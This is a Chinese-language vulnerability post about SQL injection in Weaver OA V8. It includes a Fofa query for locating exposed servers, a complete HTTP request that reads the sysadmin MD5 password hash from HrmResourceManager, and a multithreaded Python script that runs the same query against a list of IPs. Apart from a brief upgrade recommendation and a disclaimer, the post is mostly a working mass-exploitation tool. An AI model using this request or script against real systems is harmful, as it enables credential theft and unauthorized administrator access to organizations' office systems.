泛微OA V8 SQL注入获取系统管理员密码信息

gclome

原文链接：泛微OA V8 SQL注入获取系统管理员密码信息

0x01 漏洞说明

泛微协同办公系统OA V8存在SQL注入漏洞，可以通过该漏洞获取系统管理员（sysadmin）MD5后的密码值

0x02 影响版本

• 泛微OA V8
  
  

0x03 漏洞复现
Fofa搜索标题：（注意：互联网的非授权利用属于违法行为）

• 
  

app="泛微-协同办公OA"
​
该漏洞是通过前台注入，查询HrmResourceManager中的password，返回的即时系统管理员（sysadmin）的密码MD5值。
数据包如下：

1. GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
   
2. Host: IP
   
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
   
4. Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
   
5. Referer: http://120.211.7.175:8091/login/Login.jsp
   
6. Accept-Encoding: gzip, deflate
   
7. Accept-Language: zh-CN,zh;q=0.9
   
8. Cookie: JSESSIONID=abcKPQwz8VeaP9hDLT5Ix; testBanCookie=test
   
9. Connection: close

复制代码

​

MD5即可获取密码登录：
​
（这个密码有点皮～），成功登录系统：
​

批量检测POC：

1. # 泛微OA V8 SQL注入获取管理员(sysadmin)MD5后的密码信息
   
2. # fofa:  app="泛微-协同办公OA"
   
3. 
   
4. import requests
   
5. import urllib3
   
6. from  multiprocessing import Pool
   
7. urllib3.disable_warnings()
   
8. 
   
9. def title():
   
10.     print("[-------------------------------------------------]")
    
11.     print("[------------    泛微OA V8 SQL注入     ------------]")
    
12.     print("[--------    use:python3 weaverSQL.py     --------]")
    
13.     print("[------------     Author:Henry4E36    ------------]")
    
14.     print("[-------------------------------------------------]")
    
15. 
    
16. 
    
17. def target_url(url):
    
18.     target_url = url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager"
    
19.     headers = {
    
20.         "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36"
    
21.     }
    
22.     # 代理设置
    
23.     # proxy = "127.0.0.1:8080"
    
24.     # proxies = {
    
25.     #     'http': 'http://' + proxy,
    
26.     #     'https': 'https://' + proxy
    
27.     # }
    
28.     try:
    
29.         res = requests.get(url=target_url,headers=headers,verify=False,timeout=10)
    
30.         if res.status_code == 200:
    
31.             print(f"\033[31m[!]  目标系统: {url} 存在SQL注入！\033[0m")
    
32.             print("[-]  正在查询sysadmin密码信息.......")
    
33.             print(f"[-]  用户: sysadmin    密码MD5: \033[33m{res.text.strip()}\033[0m")
    
34.             print("[---------------------------------------------------------------------]")
    
35.         else:
    
36.             print(f"[0]  目标系统: {url} 不存在SQL注入！\033[0m")
    
37.             print("[---------------------------------------------------------------------]")
    
38.     except Exception as e:
    
39.         print(f"[0]  目标系统: {url} 存在未知错误！\n",e)
    
40.         print("[---------------------------------------------------------------------]")
    
41. 
    
42. 
    
43. if __name__ == "__main__":
    
44.     title()
    
45.     # 百度下加了多线程，也不知道对不对，运行没出错我就默认对了哈，不许bb我，有懂的师傅可以指导下小henry^_^
    
46.     pool = Pool(processes=10)
    
47.     with open("ip.txt","r") as f:
    
48.         for url in f:
    
49.             if url[:4] != "http":
    
50.                 url = "http://" + url
    
51.             url = url.strip()
    
52.             pool.apply_async(target_url, args=(url,))
    
53.     f.close()
    
54.     pool.close()
    
55.     pool.join()
    
56. 
    

复制代码

运行效果展示：

​


0x04 修复建议
升级到最新版本

结束语
本文章仅用于交流学习，请勿使用该漏洞进行违法活动。
https://github.com/Henry4E36/weaverSQL